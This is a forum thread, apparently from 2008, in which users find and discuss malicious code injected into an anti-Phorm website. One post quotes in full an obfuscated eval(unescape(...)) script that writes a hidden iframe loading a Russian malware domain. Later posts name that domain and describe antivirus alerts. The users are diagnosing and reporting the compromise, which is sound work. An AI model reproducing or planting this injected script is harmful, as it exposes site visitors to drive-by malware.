Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 

Support request opened. Seems the FTP and web front end aren't responding so there could be an issue there. Once the access issue is sorted the page will be reloaded onto the ftp server.

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 

maybe the Russians know more about the word phorm than we do lol

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 

There is a strange script appended to the page source "<script redacted >eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74% 75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e %74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%2 0%6e%61%6d%65%3d%31%63%61%37%65%66%63%34%61%31%20% 73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%74%72%61%66 %66%75%72%6c%2e%72%75%2f%73%6c%69%76%3f%27%2b%4d%6 1%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61% 6e%64%6f%6d%28%29%2a%32%31%35%38%37%37%29%2b%27%37 %31%5c%27%20%77%69%64%74%68%3d%36%38%31%20%68%65%6 9%67%68%74%3d%33%31%37%20%73%74%79%6c%65%3d%5c%27% 64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c %2f%69%66%72%61%6d%65%3e%27%29")); </script> " (the Redacted is my comment!)

Maybe the site has suffered from a drive by server attack http://www.theregister.co.uk/2008/04..._attack_grows/

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 

Guys.

its looks like there is some escaped code at the bottom of the page

is the enescaped script

original code.


But it also trying to run "Microsoft Data Access - Remote Data services" control


So maybe that site is trying to load some nasties.

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 

My Safari Activity Window shows this link "traffurl.ru/sliv/?5776271" Googling the domain gets a 'This site may harm your computer' message. So looks like Kapersky is correct

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 

With regard to the captains video site I am seeing no problems with Norton or Spybot resident. However there are two concerning frames appearing when I check it out with adblock.

http://traffurl.ru/sliv?4193771

this is one but the other ( also linked to an index.php at the russian URL ) seems to have disappeared as I've just done a system restart.

Edit. The offending article seems to be your hit counter

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 

I mean we all know .ru is Russia right? I mean its not just me being paranoid....

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 

Kent's friends starting a counter attack on anti-Phorm sites?

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 

counter attack suggests we attacked first

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 

When I refreshed this (forum) page just now AVG came up with a threat alert saying virus HTML/framer detected. It couldn't "heal" the page and I could only vault it. I'm posting this from another pc.

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 

Addblock and No Script are blocking the links to

http://traffurl.ru/sliv?19907971



Hmm, tis suspicious

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 

This discussion might add some more information.

http://www.developersdex.com/asp/mes...2978&r=6157380

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 

The code for the hit counter doesn't have anything to do with .ru domains - just a cgi script passing display parameters. No .ru anywhere.

The call has been updated and as soon as the response says access is available then it will be sorted.

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 

Sorry you are correct. The reason I thought it was that because I asked adblock to flash the offending frame and it appeared around your hit counter. It would appear an invisible frame is being used to upload a trojan from the Russian server.
At least you should remove the script from the page.

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 

When I can get to it I will.